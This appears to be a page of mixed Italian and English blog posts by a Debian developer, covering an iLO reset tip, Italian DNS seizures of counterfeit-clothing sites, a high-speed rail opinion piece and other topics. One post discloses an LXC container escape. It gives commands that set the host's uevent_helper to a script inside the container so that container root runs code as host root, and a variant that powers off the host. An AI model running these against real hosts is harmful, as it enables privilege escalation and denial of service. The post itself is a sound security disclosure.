R33C
Region,33,Italy,I,Marco_d'Itri,39-000-00000000,33600,MO,XA,IBN,V34,VFC,U,ENC
(Esatto, non è rimasto nessun altro.)
How to reset a confused iLO
Due to some still unknown bug, all the iLOs of two of my HP blade enclosures became confused and stopped accepting TCP connections. This not only made them unusable, but also prevented upgrading the firmware to an hopefully fixed version...
My solution: reset them from the OS by running:
ipmitool mc reset cold
HP's support solution: remove and reseat each blade.
Negli ultimi 17 anni
Nell'ordine: ho comprato un modem, ho cambiato sistema operativo, sono diventato un Debian Developer, sono stato cooptato nel GCN, ho finito la scuola, ho iniziato l'università, sono stato in quattro continenti, ho trovato degli amici, ho incontrato un grande amore, mi ha trovato qualche cliente, mi ha lasciato un grande amore, ho cambiato l'università, ho preso un gatto, ho smesso di frequentare delle persone, sono morti degli amici, ho perso del tempo, ho preso 10 kg, ho trovato il mio dream job, ho cambiato città, ho affittato una casa, ho trovato degli altri amici, ho comprato una casa.
Il problema è quello che non ho fatto, ma tutto sommato mi è andata bene.
(Ispirato da questo thread.)
Ancora censura: altri venditori di abbigliamento
Ieri la Polizia Postale di Padova ha inviato ad alcuni ISP un decreto di sequestro che elenca 493 siti, di cui chiede l'interdizione alla risoluzione degli indirizzi mediante DNS nell'ambito di un procedimento che ipotizza reati di contraffazione e ricettazione ai danni di un produttore di abbigliamento, Moncler s.p.a.
Sottolineo: è stato inviato un fax, poco leggibile, con 493 domini da ricopiare...
Ho provato a visitare una ventina di siti scelti a campione, e tranne uno sono tutti domini parcheggiati o comunque non funzionanti. Mi sembra lecito ipotizzare che l'elenco sia stato fornito da una società di brand protection, ma sarebbe abnorme iniziare a "sequestrare" domini solo perché qualcuno ritiene che violino il loro marchio.
I casi precedenti:
- The Pirate Bay
- Venditori di sigarette
- Venditori di abbigliamento
- gallinaro.angelfire.com (questo era così irrilevante che non ricordo nemmeno di cosa parlava)
- bakekaincontri.com (Annunci erotici)
- gaxetaveneta.com (giornalismo d'inchiesta o attacco a un avversario politico?)
- pornhub.com (pornografia amatoriale)
- btjunkie.org (motore di ricerca)
Evading from linux containers
For the past few years, the Linux Containers project has been developing some kernel technologies which provide isolation, accounting and management for kernel resources. When completed, together they will allow implementing lightweight virtualization of the operating system like is currently possible with OpenVZ.
It is very important to understand that not all the pieces are ready yet, so currently a LXC container does not provide the same security of other virtualization technologies.
This example shows how the root user of a container can easily run code as root in the host system, since sysfs does not support namespaces:
lxc$ cat <<END > /tmp/evil-helper #!/bin/sh echo 'hi!' >> /tmp/evil-helper.log END lxc$ chmod +x /tmp/evil-helper lxc# mkdir /sys lxc# mount -t sysfs sysfs /sys lxc# echo /var/lib/lxc/test/rootfs/tmp/evil-helper > /sys/kernel/uevent_helper lxc# echo change > /sys/class/mem/null/uevent
The last command will trigger a uevent, which will be processed by running in the host our script created inside the container.
Or else:
lxc# echo /sbin/poweroff > /sys/kernel/uevent_helper
Because of this, LXC containers are vulnerable to a malicious root user and are not really a replacement for OpenVZ. This will change when support for labelling files with user namespaces will be completed.
Circa 1964 Livermore Data Systems Model A Modem
Pensierini da terza elementare sulla TAV
È accettabile che 2000 persone pretendano l'ultima parola su un'opera che riguarda 60 milioni di persone (più gli altri milioni dall'altro lato del confine)?
Se i locali subiranno disagi a causa dei lavori è ragionevole che ottengano qualcosa in cambio, come in effetti succede in Francia. Se non vogliono un compromesso mi aspetto che i lavori inizieranno lo stesso e loro non otterranno nulla in cambio.
Fermo restando che la bassa Val di Susa è un discreto cesso, e non sarà certo un'altra ferrovia a rovinare il paesaggio...
Tra l'altro, nessuno mi ha ancora spiegato perché i Francesi, ambientalisti compresi, sono favorevoli ed hanno iniziato da anni i lavori preliminari senza antagonizzare la popolazione.
Le linee ad alta velocità che ho potuto provare fino ad ora, cioè Milano-Torino e Milano-Roma, mi piacciono tantissimo ed hanno sensibilmente migliorato la mia qualità della vita. Quindi per quanto mi riguarda si può continuare a bucare montagne ovunque per i prossimo 30 anni se i risultati sono questi. (Se della concorrenza su queste tratte riuscirà ad abbassare i prezzi, ancora meglio.)
Quando bisogna costruire un'opera pubblica si valutano costi e benefici, e per me i benefici sono grandi. Intendo proprio per me personalmente: se vogliamo adottare la linea che ciascuno deve essere pro o contro la TAV a seconda di quale effetto ha direttamente sulla propria vita allora la TAV è veramente una bella cosa, e se per farla bisogna bucare la montagna vicino a casa di qualcuno non è un mio problema: non è il mio cortile.